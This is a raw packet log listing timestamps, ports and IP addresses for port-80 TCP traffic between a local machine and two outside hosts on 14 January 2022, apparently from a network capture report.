Jan 14, 2022 00:16:15.088201046 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.088222980 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.088243961 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.088258028 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.088272095 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.088283062 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.088300943 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.088304996 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.088335037 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.088376045 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.088397980 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.088418961 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.088424921 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.088474035 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.088474989 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.088500977 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.088525057 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.088545084 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.088546038 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.088612080 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.088618040 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.088640928 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.088664055 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.088685036 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.088691950 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.088710070 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.088732958 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.088743925 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.088754892 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.088778973 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.088790894 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.088799953 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.088821888 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.088824987 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.088844061 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.088865995 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.088881016 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.088924885 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.088946104 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.088947058 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.088973045 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.088995934 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.088999987 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.089039087 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.104581118 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.123883963 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.130686045 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.130822897 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.130932093 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.131033897 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.131138086 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.131242037 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.131344080 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.131444931 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.131548882 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.131648064 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.131757021 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.131870031 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.131964922 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.132070065 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.132170916 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.132275105 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.132374048 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.132478952 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.132584095 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.132698059 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.132841110 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.132945061 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.133040905 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.133133888 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.133228064 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.133322954 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.133415937 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.133510113 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.133605003 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.133702993 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.133797884 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.133894920 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.134011984 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.134089947 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.134186983 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.134282112 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.134373903 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.134516001 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.134579897 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.134680986 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.134784937 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.134915113 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.134987116 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.135087013 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.135188103 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.135288000 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.135392904 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.135490894 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.135595083 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.135699034 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.135809898 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.135993004 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.136010885 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.136087894 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.136248112 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.136358976 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.136461020 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.136564016 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.136667967 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.136778116 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.136883020 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.136984110 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.137084961 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.137202978 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.137298107 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.137392998 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.137511969 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.137633085 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.137753963 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.137864113 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.138005972 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.138138056 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.138251066 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.138370037 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.138473988 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.138552904 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.138588905 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.138947964 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.139098883 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.139215946 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.139332056 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.139453888 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.139570951 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.139677048 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.139806986 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.139908075 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.140012026 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.140114069 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.140252113 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.140357018 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.140464067 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.140567064 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.140706062 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.140918970 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.140927076 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.141041994 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.141141891 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.141244888 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.141346931 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.141449928 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.141551018 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.141658068 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.141762018 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.141885042 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.141978979 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.142070055 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.144646883 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.156867981 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.157289028 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.157424927 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.157560110 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.157887936 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.157999039 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.158099890 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.158291101 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.158404112 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.158421040 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.158505917 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.158627987 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.158751965 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.158863068 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.158972979 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.159082890 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.159193039 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.159305096 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.159442902 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.159554958 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.159667015 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.162154913 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.162210941 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.162240982 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.162256956 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.162273884 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.162295103 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.162307978 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.162314892 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.162338972 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.162358046 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.162358999 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.162380934 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.162403107 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.162420034 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.162478924 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.162544966 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.162566900 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.162606001 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.162628889 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.162652969 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.162674904 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.162683010 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.162699938 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.162712097 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.162724018 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.162745953 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.162750006 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.162767887 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.162795067 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.162802935 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.162806988 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.162827969 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.162853003 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.162870884 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.162875891 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.162900925 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.162906885 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.162925005 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.162947893 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.162959099 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.162971973 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.162993908 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.162997007 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.163017035 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.163050890 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.163069963 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.163073063 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.163079023 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.163088083 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.163095951 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.163116932 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.163137913 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.163160086 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.163167000 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.163182974 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.163204908 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.163204908 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.163227081 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.163240910 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.163273096 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.163347006 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.163366079 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.163383961 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.163434982 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.163438082 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.163455963 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.163501024 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.163525105 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.163527966 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.163546085 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.163573980 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.163592100 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.163599014 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.163616896 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.163625002 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.163647890 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.163670063 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.163686991 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.163693905 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.163718939 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.163726091 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.163743019 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.163768053 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.163777113 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.163793087 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.163816929 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.163820982 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.163840055 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.163865089 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.163881063 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.163897991 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.163919926 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.163921118 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.163944960 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.163968086 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.163975000 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.163990974 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.164014101 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.164022923 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.164037943 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.164060116 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.164071083 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.164083004 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.164105892 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.164108038 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.164132118 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.164155960 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.164160967 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.164180040 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.164202929 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.164206028 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.164225101 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.164247990 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.164271116 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.164273024 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.164295912 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.164299965 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.164319038 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.164341927 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.164367914 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.164407969 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.170706987 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.175180912 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.175331116 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.175435066 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.175534010 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.175632000 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.175728083 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.175825119 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.175920010 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.176017046 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.176110029 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.176206112 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.176333904 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.176588058 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.176738977 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.237085104 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.237116098 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.237138987 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.237159967 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.237179041 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.237180948 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.237205982 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.237217903 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.237248898 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.237273932 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.237276077 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.237297058 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.237314939 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.237323046 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.237339973 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.237416983 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.237744093 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.237767935 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.237791061 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.237817049 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.237827063 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.237842083 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.237893105 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.237895966 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.237920046 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.237941980 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.237956047 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.237965107 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.237987995 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.237998962 CET	49920	80	192.168.2.4	141.8.194.74
